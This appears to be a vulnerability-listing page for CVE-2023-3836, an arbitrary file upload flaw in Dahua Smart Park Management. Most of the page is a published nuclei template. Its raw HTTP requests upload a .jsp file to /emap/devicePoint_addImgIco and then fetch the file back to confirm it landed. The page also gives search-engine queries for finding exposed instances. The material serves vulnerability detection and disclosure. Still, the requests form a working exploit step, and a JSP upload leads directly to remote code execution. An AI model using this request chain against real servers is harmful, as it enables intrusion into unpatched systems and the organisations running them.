CVE-2023-3836: Dahua Smart Park Management - Arbitrary File Upload

日期: 2025-08-01 | 影响软件: Dahua Smart Park Management | POC: 已公开

漏洞描述

Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?.

PoC代码[已公开]

id: CVE-2023-3836

info:
  name: Dahua Smart Park Management - Arbitrary File Upload
  author: HuTa0
  severity: critical
  description: |
    Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?.
  remediation: |
    Apply the latest security patch or update provided by the vendor to fix the arbitrary file upload vulnerability.
  reference:
    - https://github.com/qiuhuihk/cve/blob/main/upload.md
    - https://nvd.nist.gov/vuln/detail/CVE-2023-3836
    - https://vuldb.com/?ctiid.235162
    - https://vuldb.com/?id.235162
    - https://github.com/1f3lse/taiE
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-3836
    cwe-id: CWE-434
    epss-score: 0.89621
    epss-percentile: 0.99538
    cpe: cpe:2.3:a:dahuasecurity:smart_parking_management:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: dahuasecurity
    product: smart_parking_management
    shodan-query:
      - html:"/WPMS/asset"
      - http.html:"/wpms/asset"
    fofa-query: body="/wpms/asset"
    zoomeye-query: app="大华智慧园区综合管理平台"
  tags: cve2023,cve,dahua,fileupload,intrusive,rce,dahuasecurity
variables:
  random_str: "{{rand_base(6)}}"
  match_str: "{{md5(random_str)}}"

http:
  - raw:
      - |
        POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
        Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
        Host: {{Hostname}}

        --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
        Content-Disposition: form-data; name="upload"; filename="{{random_str}}.jsp"
        Content-Type: application/octet-stream
        Content-Transfer-Encoding: binary

        {{match_str}}
        --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT--
      - |
        GET /upload/emap/society_new/{{shell_filename}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code_1 == 200 && status_code_2 == 200"
          - "contains(body_2, '{{match_str}}')"
        condition: and

    extractors:
      - type: regex
        name: shell_filename
        internal: true
        part: body_1
        regex:
          - 'ico_res_(\w+)_on\.jsp'
# digest: 4b0a00483046022100a1b4bd1301e9db7eb8966ebe4ec6b9510b60d40e570f4790b038bd8c1b99ead9022100cac84b2e25cc5512af53dc18310e5e00b21f91bfbb63c822117170cad342970e:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2023/CVE-2023-3836.yaml

相关漏洞推荐